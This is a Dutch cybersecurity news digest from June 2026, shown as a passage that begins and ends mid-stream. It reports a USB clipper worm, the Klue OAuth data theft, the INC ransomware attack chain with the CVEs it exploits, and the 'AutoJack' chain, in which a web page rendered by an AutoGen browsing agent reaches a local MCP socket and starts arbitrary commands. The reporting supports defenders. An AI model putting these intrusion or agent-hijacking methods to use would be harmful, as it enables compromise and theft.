Alarum Technologies, de in Tel Aviv gevestigde moedermaatschappij van NetNut, stelde echter dat de rapporten van Synthient en Qurium "aantoonbaar onnauwkeurige beweringen en gebrekkige conclusies bevatten in plaats van geverifieerde feiten." Alarum deelde een verklaring waarin zij de fundamentele karakterisering van de SDK's en technologieën die in de rapporten worden besproken als een "botnet" verwerpen. "De betreffende SDK's zijn ontworpen om functionaliteit voor bandbreedte-deling te faciliteren en transformeren gebruikersapparaten niet in door malware gecontroleerde systemen, noch compromitteren zij de apparaten waarop ze werken," luidt de verklaring. "NetNut exploiteert een commercieel proxynetwerk en handhaaft beleid, procedures en technologische maatregelen die zijn ontworpen om legaal en verantwoord gebruik van haar diensten te bevorderen." Alarum voegde eraan toe dat NetNut "aanzienlijke nadruk legt op passende kennisgevings- en toestemmingsmechanismen, klantonderzoek uitvoert, controleert op mogelijk misbruik en stappen onderneemt om verdachte of ongeautoriseerde activiteiten te detecteren en te beperken." Hun verklaring vervolgde: "Deze werkwijze wordt ondersteund door zowel interne procedures en beleid, inclusief het uitvoeren van KYC-controles en aanvullend due diligence van de klanten van NetNut, als door het toepassen van diverse technologische maatregelen, ontworpen om te helpen bij het identificeren en aanpakken van vermoedelijk misbruik van het netwerk."

Echter, in een rapport dat op 8 juni werd uitgebracht, beweerde de proxy tracking service Spur dat NetNut geen bedrijfsverificatie of zinvolle "know your customer"-procedures vereist voordat klanten proxytoegang kunnen kopen. Spur schreef: "Een individu kan zich aanmelden, betalen en verkeer routeren via partneradresruimte, inclusief ruimte die toebehoort aan instellingen waarvan de gebruikers nooit hebben ingestemd."

 

Bron: Synthient | Bron 2: github.com | Bron 3: blog.xlab.qianxin.com

19 juni 2026 | USB-worm verspreidt crypto-stealing malware via Windows snelkoppelingen

Dreigingsactoren verspreiden sinds minstens februari malware die zich via USB-drives verspreidt en zich richt op cryptocurrency-wallets. Deze campagne maakt gebruik van snelkoppeling-bestanden (LNK-bestanden) op USB-drives om 'clipper'-malware te installeren. Deze malware monitort de inhoud van het klembord en vervangt cryptocurrency-walletadressen door adressen die onder controle staan van de aanvallers. Daarnaast zoekt de malware naar 'seed phrases' en privé-sleutels, en maakt het screenshots die via het netwerk van Tor worden geëxfiltreerd. De communicatie met de command-and-control (C2) server verloopt eveneens via Tor, wat de herkomst van de aanvallers verhult.

Het infectieproces begint wanneer het slachtoffer een LNK-bestand op de USB-drive opent, waardoor de malware op het systeem wordt geactiveerd. Aanvullende 'payloads' worden vervolgens gedownload vanaf een .onion-adres. De malware scant het systeem lokaal op documentbestanden. Zodra deze zijn gevonden, verbergt de malware de originele bestanden en vervangt ze door kwaadaardige snelkoppelingen met dezelfde namen. Dit zorgt ervoor dat de malware wordt uitgevoerd wanneer gebruikers proberen de documenten te openen. Om persistentie te garanderen, creëert de worm een geplande taak die continu nieuwe aangesloten USB-opslagapparaten monitort. Wanneer een verwisselbare schijf wordt verbonden, kopieert de malware zichzelf naar het apparaat en creëert het daar ook kwaadaardige snelkoppeling-bestanden.

De 'stealer'-component van de malware wordt geactiveerd nadat is gecontroleerd of Taakbeheer inactief is. Vervolgens wordt de communicatie met de C2-host tot stand gebracht met behulp van een Tor-uitvoerbaar bestand (ugate.exe). Elke halve seconde controleert de malware het klembord op specifieke gegevens, waaronder 12-woord en 24-woord BIP39 'seed phrases', Ethereum privé-sleutels, Bitcoin WIF-sleutels, en verschillende Bitcoin-walletadressen (legacy, P2SH, Bech32, Taproot), evenals Tron- en Monero-walletadressen. De doelwitadressen worden gekozen op basis van hun begincijfers of -tekens, zodat ze gedeeltelijk lijken op de walletadressen van de aanvallers, om de kans te verkleinen dat de gebruiker de fraude bij een snelle blik ontdekt.

Naast het monitoren van het klembord, maakt de malware ook elke tien seconden vijf screenshots van het scherm van het slachtoffer en stuurt deze naar de C2 met behulp van het 'curl'-programma. Volgens onderzoekers van Microsoft, die deze campagne hebben geanalyseerd, ondersteunt de malware ook externe code-uitvoering, die kan worden geactiveerd door een C2 EVAL-instructie. Hierbij downloadt de malware JavaScript-inhoud naar een bestand genaamd 'cfile' en voert dit uit op de geïnfecteerde machine. De onderzoekers stellen dat de sterkste indicatoren van een infectie gedragsmatig zijn, in plaats van gebaseerd op handtekeningen. Zij adviseren dan ook om te monitoren op procesactiviteit van wscript.exe en cscript.exe, onverwachte lanceringen van curl, PowerShell en cmd.exe, samen met ongebruikelijke 'child processes'. Bovendien zijn verbindingen naar 'localhost:9050' en Tor-proxy-activiteit duidelijke waarschuwingssignalen die geassocieerd worden met deze campagne.

 

Bron: Microsoft | Bron 2: hubs.li

19 juni 2026 | Risico's van onbeheerde AI-systemen in bedrijfsnetwerken

De snelle implementatie van interne AI tools binnen bedrijven leidt tot een aanzienlijke administratieve achterstand, met name in de vorm van 'orphaned agents' en 'standing privileges'. Orphaned agents zijn AI tools die actief blijven nadat de medewerker die ze heeft gecreëerd het bedrijf heeft verlaten. Deze tools behouden vaak ongecontroleerde toegang tot gevoelige databases en broncode, zelfs lang nadat de inloggegevens van de menselijke gebruiker zijn ingetrokken. Standing privileges verwijzen naar AI-systemen die permanente, onbeperkte toegang behouden die ze niet langer nodig hebben.

De kern van het probleem is dat bestaande beveiligingsoplossingen AI behandelen als statische software. Echter, AI-systemen zijn dynamisch; ze halen, verplaatsen en interageren continu zelfstandig met data. Een standaard beveiligingsfilter dat een AI tool een volledige repository ziet ophalen, gaat er doorgaans van uit dat de applicatie simpelweg zijn werk doet. Het systeem herkent niet dat de medewerker die de tool oorspronkelijk heeft geactiveerd, mogelijk al weken geleden is vertrokken. Hierdoor kan het beveiligingssysteem niet beoordelen of de actie kwaadaardig is, omdat het niet weet onder welke identiteit de AI-agent opereert. De toegangstoken blijft actief, zelfs als de ontwikkelaar die de automatisering heeft gebouwd, maanden geleden is vertrokken.

Een technische analyse richt zich op de 'identiteitskloof': het beveiligen van een AI tool op zichzelf is onvoldoende als niet bekend is onder welke referenties deze werkt. Het is cruciaal om 'Shadow AI' op te sporen, wat verwijst naar ongedocumenteerde AI tools die momenteel actief zijn binnen het netwerk. Er bestaan stappenplannen om deze tools te traceren en onmiddellijk inzicht te krijgen in het AI-gebruik binnen de onderneming, zonder knelpunten in de netwerkinfrastructuur te veroorzaken. Het doel is om dergelijke toegang in te trekken voordat een aanvaller deze kan misbruiken.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

19 juni 2026 | Cryptostelende malware voor clipper verspreidt zich via usb-sticks

Microsoft heeft een waarschuwing afgegeven voor malware die usb-sticks infecteert en zich richt op het stelen van cryptovaluta. De dreiging is een combinatie van een computerworm en zogenaamde malware voor clipper. Deze malware is ontworpen om in te grijpen in het proces waarbij gebruikers van cryptovaluta transacties uitvoeren. Wanneer een gebruiker een walletadres van een begunstigde kopieert om een betaling te doen of geld over te maken, bevindt dit adres zich tijdelijk in het klembord van de computer of telefoon.

De malware voor clipper maakt gebruik van dit moment om het gekopieerde adres ongemerkt te vervangen door een adres dat eigendom is van de aanvaller. Als het slachtoffer het adres vervolgens op de transactiepagina plakt zonder zorgvuldige controle, wordt het geld overgemaakt naar de wallet van de aanvaller in plaats van naar de oorspronkelijk bedoelde ontvanger.

Naast deze clipper-functionaliteit is de malware ook in staat om 'seed phrases' en 'private keys' voor Ethereum en Bitcoin WIF te stelen. Deze gegevens zijn cruciaal voor het verkrijgen van volledige controle over een cryptowallet. De aanvallers maken tevens screenshots van de systemen van slachtoffers. Microsoft stelt dat deze screenshots de daders helpen om meer inzicht te krijgen in de configuratie van de cryptowallet en het financiële vermogen van het slachtoffer.

Een opvallende eigenschap van deze malware is de manier waarop deze zich verspreidt. De initiële infecties die door Microsoft werden waargenomen, begonnen met het openen van malafide .lnk-bestanden op besmette usb-sticks. Eenmaal geïnstalleerd op een systeem, zoekt de malware actief naar aangesloten usb-sticks die nog niet zijn geïnfecteerd. Op deze sticks verbergt de malware vervolgens de originele documentbestanden, zoals .doc, .xlsx en .pdf-bestanden. Tegelijkertijd creëert de malware nieuwe, malafide .lnk-bestanden die dezelfde namen hebben als de verborgen documenten. Aangezien Windows standaard bestandsextensies niet toont, is het voor gebruikers moeilijk te zien dat zij een snelkoppeling openen in plaats van het daadwerkelijke document.

Wanneer een van deze malafide .lnk-bestanden op een schoon systeem wordt geopend, raakt ook die computer besmet, waardoor de malware zich verder kan verspreiden. Microsoft adviseert organisaties om maatregelen te nemen, waaronder het blokkeren van .lnk-bestanden op usb-sticks door middel van een Group Policy Object (GPO). Daarnaast wordt aanbevolen om de functionaliteit voor AutoRun/AutoPlay voor alle verwijderbare media uit te schakelen om verdere verspreiding te voorkomen.

 

Bron: Microsoft

19 juni 2026 | Microsoft onthult Windows Clipper-malwarecampagne met USB-worm en Tor-C2

Microsoft heeft details bekendgemaakt van een recente Windows-gebaseerde cryptocurrency clipper-campagne die sinds februari 2026 actief is. Deze campagne richt zich op gebruikers met malware die het klembord onderschept, zichzelf kan verspreiden en het Tor-anonimiteitsnetwerk gebruikt om communicatie te verbergen. Het Microsoft Defender Security Research Team stelt in een analyse, gepubliceerd op dinsdag, dat de clipper afhankelijk is van Windows Script Host en door ActiveX aangestuurde logica om een gebundelde Tor-proxy te starten en een C2-server (command-and-control) via een hidden service te bevragen. De malware voert frequent diefstal van het klembord uit, exfiltreert screenshots en vervangt wallet-adressen.

De uitvoering van deze clipper is opmerkelijk omdat deze niet afhankelijk is van een traditionele installer of blootgestelde IP-gebaseerde C2-infrastructuur. In plaats daarvan wordt een draagbare Tor-client ingezet, wordt verkeer via een lokale SOCKS5-proxy gerouteerd en wordt data diefstal gecombineerd met remote code execution. Hierdoor transformeert een stealer met financieel motief in een lichtgewicht backdoor. malware voor Clipper is kwaadaardige software die stilletjes het klembord van een gebruiker monitort en gevoelige gegevens onderschept die in de tijdelijke buffer worden geplakt. Het richt zich voornamelijk op cryptocurrency-transacties door wallet-adresreeksen die overeenkomen met bekende blockchain-adrespatronen te vervangen, om deze naar adressen onder controle van de aanvallers te leiden.

De aanvallen omvatten de verspreiding van een kwaadaardig Windows snelkoppeling (LNK)-bestand via USB-opslagapparaten. Het openen hiervan triggert een wormcomponent die controleert of de machine al geïnfecteerd is en pas dan de payload van een externe server ophaalt als deze niet aanwezig is. Een tweede module die wordt geïmplementeerd, is de clipper die cryptocurrency-walletinformatie verzamelt en exfiltreert.

De LNK-payload scant het USB-apparaat op veelvoorkomende documenttypen zoals DOC, XLSX en PDF. Indien gevonden, worden deze documenten verborgen en worden nieuwe LNK-bestanden met dezelfde bestandsnamen aangemaakt. Deze nieuwe LNK-bestanden bevatten argumenten die verwijzen naar de wormcomponent. Wanneer een nietsvermoedende gebruiker de snelkoppeling opent, in de veronderstelling dat hij een onschuldig document opent, wordt de uitvoering van de malware getriggerd. De wormcomponent zorgt niet alleen voor de verspreiding naar andere niet-gecompromitteerde USB-drives, maar implementeert ook geplande taken als vorm van persistentie voor zowel de worm- als de stealer-component. De clipper gebruikt op zijn beurt WScript en ActiveXObject om te interageren met het besturingssysteem en sluit af als Taakbeheer tot de lijst van actief draaiende processen behoort, om detectie te omzeilen.

In de laatste fase start de malware een hernoemde Tor-binary in een verborgen venster, genereert een unieke slachtoffer-ID en registreert deze bij de externe server. Zodra deze stap is voltooid, gaat de malware een continue lus in, waarbij periodiek de C2-server wordt bevraagd op instructies, terwijl tegelijkertijd het klembord elke 500 milliseconden wordt gemonitord om seed phrases en private keys te extraheren. Microsoft voegt hieraan toe dat de malware ook cryptocurrency-adressen kaapt door gekopieerde wallet-waarden te vervangen door alternatieven die door aanvallers worden beheerd, en screenshots uploadt via Tor. Als de C2 een EVAL-antwoord retourneert, voert de malware door de aanvaller geleverde code uit tijdens runtime.

De techgigant heeft verdedigers aanbevolen om prioriteit te geven aan gedragsdetecties boven statische signatures. Specifiek moet worden gelet op schermopnames via PowerShell en het gebruik van WScript, CScript of gerelateerde script engines voor het starten van curl, cmd.exe, PowerShell of onverwachte uitvoerbare bestanden. Andere mitigaties omvatten het uitschakelen van AutoRun/AutoPlay voor alle verwijderbare media, het blokkeren van LNK-uitvoering vanaf verwijderbare schijven via Group Policy Objects (GPO's), het beperken van onnodig gebruik van wscript.exe of cscript.exe, en het controleren van gedrag gerelateerd aan het klembord en schermopnames op apparaten die gevoelige financiële workflows afhandelen.

 

Bron: Microsoft

19 juni 2026 | OAuth-lek bij Klue leidt tot diefstal van Salesforce CRM-data door 'Icarus'

Het marktintelligentieplatform Klue is getroffen door een OAuth-lek, waardoor de dreigingsactor 'Icarus' erin is geslaagd om Salesforce CRM-data te stelen van diverse organisaties. Deze data wordt nu gebruikt in een afpersingscampagne. Bronnen meldden gisteren aan BleepingComputer dat meerdere organisaties slachtoffer zijn geworden van datadiefstal en nu worden afgeperst door de relatief nieuwe afpersingsgroep Icarus.

De cybersecuritybedrijven ReliaQuest en Huntress hebben onafhankelijk van elkaar rapporten gepubliceerd die het beveiligingsincident bevestigen. Huntress heeft bovendien aangegeven dat hun eigen Salesforce-data is gestolen bij de aanval. Als reactie op het incident heeft Salesforce de verbinding tussen de Klue Battlecards-applicatie en zijn platform uitgeschakeld om klanten te beschermen. Salesforce waarschuwde gisteren dat organisaties via deze applicatie geen verbinding meer kunnen maken, totdat de situatie is opgelost.

Volgens ReliaQuest kregen de aanvallers toegang tot de serviceaccounts van de Klue Battlecards-integratie. Vervolgens gebruikten zij OAuth-tokens die gekoppeld waren aan Salesforce-instances van klanten om de datadiefstal uit te voeren. Onderzoekers observeerden dat de dreigingsactoren OAuth-tokens genereerden en daarna geautomatiseerde Python-scripts inzetten om gedurende bijna 24 uur de REST API van Salesforce te bevragen.

De aanvalsactiviteit begon met het verkennen van de Salesforce-instances van een organisatie via het '/services/data/v59.0/sobjects'-eindpunt, waarna de data werd geëxfiltreerd via het '/services/data/v59.0/query'-eindpunt. ReliaQuest meldde dat bij een van de getroffen organisaties de aanvallers methodisch de Salesforce-objecten in kaart brachten om waardevolle data te identificeren, om deze vervolgens snel te stelen. Hierbij werden bijna duizend query's in een kwartier verstuurd. In een ander geval werd de exfiltratie over een periode van zes uur waargenomen.

De onderzoekers van ReliaQuest merkten op dat de activiteit sterk leek op eerdere datadiefstal aanvallen via Salesforce-integraties door de afpersingsgroep ShinyHunters. BleepingComputer vernam echter dat de huidige aanvallen niet door ShinyHunters, maar door de relatief nieuwe dreigingsactor 'Icarus' zijn uitgevoerd. Icarus is al begonnen met het versturen van afpersingsmails naar Klue-klanten die door het lek zijn getroffen. Een door BleepingComputer ingezien losgeldbrief toonde aan dat de e-mails werden verzonden onder de alias "mr bean" en een Session Messenger ID bevatten voor contact.

De dataleksite van Icarus bevat ook een boodschap die hint naar de afpersingscampagne, met de titel "Get Ready" en de tekst "big corps getting listed. be ready." Icarus zou in april 2026 zijn gelanceerd en vermeldde aanvankelijk twee slachtoffers op zijn dataleksite. Eén van deze slachtoffers zou verbonden zijn met de campagne van Klue en is inmiddels van de site verwijderd, wat mogelijk duidt op onderhandelingen.

Huntress maakte vandaag bekend zelf ook getroffen te zijn door het Klue-lek en bevestigde een vergelijkbare afpersingsmail te hebben ontvangen. De Session ID in latere e-mails kwam overeen met die op de dataleksite van Icarus, wat extra bewijs levert voor hun betrokkenheid. Klue heeft klanten geïnformeerd dat de aanvallers eerst de backendsystemen van het bedrijf in gevaar brachten en vervolgens een malafide code-update doorvoerden die OAuth-tokens stal. Deze tokens werden gebruikt door klanten om het Battlecards-product te integreren met externe platforms. De aanvallers maakten daarbij misbruik van een slapende, maar nog steeds actieve, credential die Klue had aangemaakt voor een prototype-integratie.

 

Bron: ReliaQuest | Bron 2: status.salesforce.com | Bron 3: huntress.com

19 juni 2026 | INC Ransomware groeit uit tot prominente RaaS-dreiging met meer dan 830 slachtoffers

Onderzoekers op het gebied van cyberbeveiliging hebben de evolutie van INC in kaart gebracht, van een beginnende ransomware-as-a-service (RaaS) operatie tot een van de meest productieve cybercriminele groepen in 2026. Sinds augustus 2023 heeft de groep meer dan 830 slachtoffers geclaimd.

Volgens Darrel Virtusio, onderzoeker bij Acronis, hebben de verstoring van LockBit en de sluiting van BlackCat kansen gecreëerd voor INC om uit te breiden, doordat aangesloten partijen migreerden naar alternatieve ransomware-operaties. Meer dan 65% van de vermelde slachtoffers zijn organisaties in de Verenigde Staten, waarbij juridische diensten, de maakindustrie, de bouw, technologie en de gezondheidszorg tot de meest getroffen sectoren behoren.

De encryptors van INC voor Windows en Linux/ESXi zijn herschreven in de programmeertaal Rust. Dit vergemakkelijkt de ontwikkeling voor verschillende platforms en verbetert de weerstand tegen reverse engineering pogingen. Aanvallen met deze ransomware kenmerken zich door het gebruik van een bijgewerkte credential dumper, die in staat is om nieuwere Veeam backup implementaties aan te vallen die gebruikmaken van gezouten DPAPI credential encryptie.

Bovendien heeft de verkoop van de Windows- en Linux-varianten van INC op het cybercriminele ondergrondse circuit in mei 2024 geleid tot de opkomst van gerelateerde ransomware-families zoals Lynx en Sinobi, met een "aanzienlijke code-overlap". Tegelijkertijd blijft het merk INC zich verder ontwikkelen.

Acronis stelt dat aangesloten partijen van INC ransomware een divers scala aan tools en technieken inzetten bij het aanvallen van slachtoffers. In hun meest recente campagnes blijven ze kwetsbare edge-apparaten zonder patches misbruiken voor initiële toegang, dumpen ze credentials van Veeam backup servers, en gebruiken ze een combinatie van living-off-the-land binaries (LOLBins) en commerciële RMM-tools (Remote Monitoring and Management) om zich door de netwerken van slachtoffers te bewegen.

De algehele aanvalsketen die door de groep voor dubbele afpersing wordt gehanteerd, omvat de volgende stappen:

1.  **Initiële toegang verkrijgen:** Dit gebeurt via diverse methoden, waaronder spear-phishing, accountgegevens die zijn gekocht van Initial Access Brokers (IABs), en het misbruiken van kwetsbaarheden in publiekelijk toegankelijke applicaties zoals Citrix Netscaler (CVE-2023-3519 en CVE-2025-5777), Fortinet EMS (CVE-2023-48788), en SimpleHelp (CVE-2024-57727).

2.  **Gevoelige credentials extraheren:** Gegevens worden uit de gecompromitteerde omgeving gehaald.

3.  **Laterale beweging:** Living-off-the-land binaries (LOLBins), zoals remote desktop protocol (RDP) en PsExec, worden gebruikt om zich binnen het netwerk te verplaatsen.

4.  **Systeemverdediging uitschakelen:** De bring your own vulnerable drive (BYOVD) techniek wordt toegepast met behulp van filwfp.sys, filnk.sys, fildds.sys om de systeemverdediging te belemmeren.

5.  **Command and Control (C2):** Cobalt Strike, AnyDesk, ScreenConnect en TeamViewer worden ingezet voor C2-communicatie.

6.  **Data exfiltratie:** Gegevens van belang worden geëxfiltreerd met Rclone, nadat ze zijn klaargemaakt als met een wachtwoord beveiligde archieven.

7.  **Encryptie:** De encryptor wordt uitgevoerd en het proces wordt versneld met technieken zoals multithreading en partiële encryptie. De payload beschikt over een commandoregel interface die de operator meer controle geeft tijdens handmatige implementaties. Wanneer deze wordt uitgevoerd met het argument "--esxi", probeert de encryptor virtuele machines af te sluiten.

De bevindingen tonen aan dat ransomware-groepen succesvol kunnen zijn en kunnen opschalen door algemeen bekende technieken te volgen, zonder afhankelijk te zijn van geavanceerde methoden of op maat gemaakte tools. Dit resulteert in een constante stroom van slachtoffers in diverse geografische gebieden en sectoren. Gegevens verzameld door ZeroFox laten zien dat INC ransomware in het eerste kwartaal van 2026 de vierde meest prominente ransomware-groep was, na Qilin (338), Akira (197) en The Gentlemen (192), met meer dan 120 incidenten in die periode.

Acronis concludeert dat INC zijn ransomware-operatie blijft versterken door middel van Rust-gebaseerde payload-herschrijvingen en continue verbetering van de toolkit. De groep richt zich zorgvuldig op sectoren zoals de gezondheidszorg, juridische diensten, professionele diensten, de maakindustrie en de bouw, waar operationele downtime sterke financiële druk creëert om losgeld te betalen. Deze dreiging wordt verder versterkt omdat deze sectoren sterk afhankelijk zijn van ononderbroken operaties en toeleveringsketens, waardoor het risico op indirecte blootstelling via leveranciersnetwerken en partners toeneemt wanneer inbreuken plaatsvinden.

 

Bron: Acronis | Bron 2: nvd.nist.gov

19 juni 2026 | Britse NCSC waarschuwt voor risico's van AI-gegenereerde code bij gevoelige data

Het Britse National Cyber Security Centre (NCSC) adviseert ontwikkelaars en organisaties om terughoudend te zijn met het gebruik van 'vibe coding' voor de ontwikkeling van applicaties en andere software die gevoelige persoonlijke gegevens en geheime informatie verwerken. Hoewel het NCSC benadrukt dat 'vibe coding' niet per definitie verkeerd is, moet er zorgvuldig worden overwogen voor welke doeleinden deze methode wordt ingezet.

'Vibe coding' houdt in dat een persoon met behulp van prompts aangeeft welke functionaliteiten de software moet bezitten, waarna modellen met kunstmatige intelligentie de code voor het programma genereren. Volgens de Britse overheidsdienst is deze aanpak uitstekend geschikt voor het ontwikkelen van 'proof-of-concepts' waarbij snelheid cruciaal is, of voor het maken van demonstraties om ideeën over te brengen. Echter, voor kritieke functionaliteiten zoals de logica voor inloggen op een publieke website, code die gevoelige gegevens van klanten verwerkt, of alles wat geheime tokens of gegevens voor inloggen behandelt, geldt een ander verhaal.

Het NCSC stelt dat het gevaar niet zozeer schuilt in het gebruik van kunstmatige intelligentie zelf. Het risico ligt veeleer in het onvoldoende toepassen van de juiste waarborgen wanneer de inzet hoog is. Het draait om het besef dat verschillende soorten code variërende niveaus van zorg en toezicht vereisen. De overheidsdienst erkent dat de modellen met kunstmatige intelligentie zich snel ontwikkelen en dat 'vibe coding' in de toekomst mogelijk voor meer toepassingen betrouwbaar zal zijn. "Wat nu riskant aanvoelt, kan over een jaar routine zijn, maar zover zijn we nog niet", aldus het NCSC. Zij adviseren om de huidige aanpak te baseren op de realiteit van vandaag, en niet op de toekomstige mogelijkheden.

 

Bron: National Cyber Security Centre (NCSC) | Bron 2: ncsc.gov.uk

19 juni 2026 | Nieuwe methode voor reverse engineering van VB6-binaire bestanden met AI-agents

Cisco Talos heeft een nieuwe aanpak gedemonstreerd voor het automatiseren van reverse engineering, waarbij AI-agents worden ingezet om bestaande analysehulpmiddelen te sturen. Deze methode maakt gebruik van de blootgestelde interne objectmodellen van traditionele grafische gebruikersinterface (GUI) applicaties, waardoor diepgaande analyse en automatisering mogelijk zijn zonder de kernapplicatie te wijzigen. Dit concept, omschreven als "local agentic reverse engineering", toont aan dat tools geen ingebouwde AI hoeven te hebben om agent-gebaseerde workflows te ondersteunen, zolang ze hun data via een extern script-interface beschikbaar maken.

De techniek is specifiek toegepast op VB6-binaire bestanden, die bekendstaan om hun complexe bestandsindeling met ingebedde metadata. Het herstellen van geavanceerde data-inbeddingen vereist gespecialiseerde tools die de interne bestandsindeling van VB6, zoals de VB-header, de objecttabel en de P-code-indeling, nauwkeurig kunnen interpreteren. Cisco Talos heeft laten zien hoe AI-agents bestaande tools kunnen automatiseren en diep in de resultaten kunnen doordringen.

De kern van de methode bestaat uit drie componenten. Ten eerste, het live objectmodel van vbdec. De disassembler vbdec, een tool voor VB6-binaire bestanden, houdt zijn geparseerde model niet verborgen achter de GUI. Wanneer een binair bestand wordt geladen en scripting op afstand is ingeschakeld (via Help → Options → Enable Remote Scripting), registreert vbdec zijn centrale CVBProject-object en zijn hoofdformulier in de Windows Running Object Table (ROT) onder de monikers `vbdec.vbp` en `vbdec.frmMain`. De ROT is een systeemwijde directory van live Component Object Model (COM)-objecten, waardoor elk proces een object kan opzoeken en een referentie naar de actieve instantie kan ontvangen. Vanuit een script is dit mogelijk met een enkele regel: `Set o = GetObject("vbdec.vbp")`. De variabele 'o' krijgt dan toegang tot het gehele geparseerde project, inclusief formulieren, klassen, modules, gedeclareerde API's, P-code-bodies, controles en strings, gepresenteerd als een navigeerbare objectgraaf. Deze mogelijkheid kan zelfs geforceerd worden toegevoegd aan VB6-hostapplicaties zonder toegang tot de broncode.

Ten tweede, het contract. Een live model is nutteloos voor een agent die de structuur ervan niet kent. vbdec bevat nu een ondersteuningspakket voor AI-agents (`vbdec_ai.zip`). Dit pakket omvat een operatorbriefing (`_claude_vbdec_ai_instructions.txt`), een kort Markdown-bestand dat de agent informeert over vbdec, hoe te binden aan de ROT, en hoe het objectmodel is gestructureerd. Daarnaast bevat het een 'proto'-map met 90 automatisch gegenereerde klassendefinities die elke openbare klasse en elk formulier dat vbdec beschikbaar stelt, beschrijven. De agent gebruikt deze als de gezaghebbende referentie voor lidnamen en -typen.

Ten derde, de lokale agent. In de demonstratie van Talos werd Claude Code lokaal op het werkstation uitgevoerd. De analist opent een terminal, wijst de AI naar de briefing en prototypes, en beschrijft eenvoudigweg wat geanalyseerd moet worden. Claude Code voert vervolgens meerdere VBS-bestanden uit met `cscript` en verkent de data iteratief. Er is geen vooraf geselecteerde AI-integratie ingebed in vbdec, geen upload van het binaire bestand van de analist, en geen verbinding die als afzonderlijke codebase hoeft te worden onderhouden. De agent en disassembler delen een machine en bestandssysteem; analyse vindt lokaal plaats, waarbij alleen de modelinferentieaanvragen het werkstation verlaten.

De effectiviteit van deze methode werd getest met een P-code-versie van PDFStreamDumper. Voorbeelden van uitgevoerde taken zijn het decompliereren van een functie, waarbij de agent de broncode reconstrueert uit de P-code, de VB-VM-opcode-stroom analyseert en een equivalent op broncodeniveau produceert met inline-opmerkingen. De AI was zelfs in staat om zelfstandig subfuncties te identificeren, hun doel te bepalen en ze redelijke namen te geven. Een ander voorbeeld was het bouwen van een oproepgraaf, waarbij de agent de `CCodeBody.Disasm` doorloopt, oproep-opcodes identificeert (zoals ImpAdCallI2, VCallHresult, LateMemCall) en een Graphviz DOT-graaf genereert met diepte-tracking. Deze resultaten tonen aan dat de methode bruikbare reverse-engineering-output kan genereren die een mens aanzienlijke tijd zou kosten om te produceren, nu schaalbaar en binnen enkele seconden gegenereerd.

 

Bron: Cisco Talos | Bron 2: github.com | Bron 3: sandsprite.com

19 juni 2026 | 'AutoJack' exploit toont RCE-risico in AI-agent frameworks

Onderzoek naar de beveiliging van AI-agent frameworks heeft een exploitketen genaamd 'AutoJack' geïdentificeerd in AutoGen Studio, de open source prototyping gebruikersinterface van Microsoft's AutoGen. Deze techniek maakt het mogelijk dat onbetrouwbare webinhoud, gerenderd door een browsing agent, een lokale Model Context Protocol (MCP) WebSocket kan bereiken en willekeurige processen op de host kan starten, wat resulteert in remote code-executie (RCE). De aanval omzeilt de vertrouwensgrens van localhost, waarop veel ontwikkelaarstools vertrouwen, door de agent te gebruiken als een 'last-mile' leveringsvoertuig voor de aanvaller.

Het gedrag is gemeld aan het Microsoft Security Response Center (MSRC). Na de melding hebben de beheerders van AutoGen Studio de hoofdtak van de upstream code versterkt in commit b047730. Dit probleem is gedurende de ontwikkelingsfase geïdentificeerd en aangepakt. De betreffende kwetsbare MCP WebSocket-functionaliteit is nooit opgenomen in een Python Package Index (PyPI) release. Gebruikers die AutoGen Studio via PyPI installeren, zijn daardoor niet blootgesteld aan deze specifieke exploitketen.

De bredere les die hieruit getrokken kan worden, is van algemene aard. Wanneer een AI-agent onbetrouwbare webpagina's kan browsen en tevens kan communiceren met geprivilegieerde lokale services, dan houdt localhost op een vertrouwensgrens te zijn. Control planes moeten in dergelijke gevallen geauthenticeerd, geautoriseerd en geïsoleerd zijn. Moderne AI-agenten genereren niet alleen tekst; ze lezen bestanden, browsen pagina's, roepen API's aan en gebruiken externe tools. Deze functionaliteiten maken ze waardevol, maar vormen tegelijkertijd een risico voor systemische uitvoeringsrisico's in de frameworks die modellen aan tools koppelen.

De exploitketen van AutoJack combineert drie onafhankelijke zwakke punten in de MCP WebSocket-functionaliteit van AutoGen Studio:

1.  **Zwakke Origin-controle**: De MCP WebSocket van AutoGen Studio vertrouwt op de conventionele verdediging tegen browser-gestuurde cross-site WebSocket-kaping (CSWSH), waarbij alleen same-origin-verbindingen van 127.0.0.1 / localhost zijn toegestaan. Voor een menselijke gebruiker die een tabblad opent naar een kwaadaardige website, zou dit correct werken. Echter, een AutoGen-agent met ingebouwde webbrowser-tooling (zoals MultimodalWebSurfer) erft de localhost-identiteit wanneer deze onbetrouwbare inhoud laadt. De 'origin' van JavaScript uitgevoerd door zo'n headless browser voldoet dan aan de toegestane lijst, waardoor de controle wordt omzeild.

2.  **Ontbrekende authenticatie op WebSocket**: De AuthMiddleware, die voor FastAPI route dispatch draait, bevat een vroege-return voor WebSocket-stijl paden. Hoewel de intentie was dat de WebSocket-handler zelf de authenticatie zou afdwingen bij acceptatie, heeft de MCP-route deze verantwoordelijkheid nooit opgepakt. Dit betekent dat het inschakelen van authenticatie in `config.yaml` dit lek niet dicht.

3.  **Command-injectie**: De MCP WebSocket-route in de ontwikkelingsbuild leest een `server_params` queryparameter, base64-decodeert deze, JSON-parseert deze naar `StdioServerParams`, en geeft deze door aan `stdio_client()`. De `StdioServerParams.command` en `StdioServerParams.args` worden gebruikt om een MCP-"server"-proces te starten. Er is geen toegestane lijst die bepaalt dat het uitvoerbare bestand een MCP-sprekende binary moet zijn, waardoor willekeurige commando's zoals `calc.exe`, `powershell.exe` of `bash -c` kunnen worden uitgevoerd.

Door deze zwakke punten te combineren met een webpagina op het open internet, gerenderd door een AutoGen-agent op dezelfde machine, ontstaat een remote code-executie primitief. Gebruikersinteractie is niet vereist, behalve dat de agent de kwaadaardige pagina rendert. De naam 'AutoJack' verwijst naar het 'kapen' van de browsing agent om deze als een 'confused deputy' over de localhost-grens te laten rijden naar het MCP-controlepaneel van AutoGen Studio.

De uitleg dient uitsluitend ter demonstratie. De exploitketen werkt niet op de huidige builds, maar is opgenomen zodat verdedigers het patroon in andere agent frameworks kunnen herkennen.

 

Bron: Microsoft

19 juni 2026 | Nieuwe 'Agentjacking'-techniek kaapt AI-codeerassistenten via valse bugrapporten

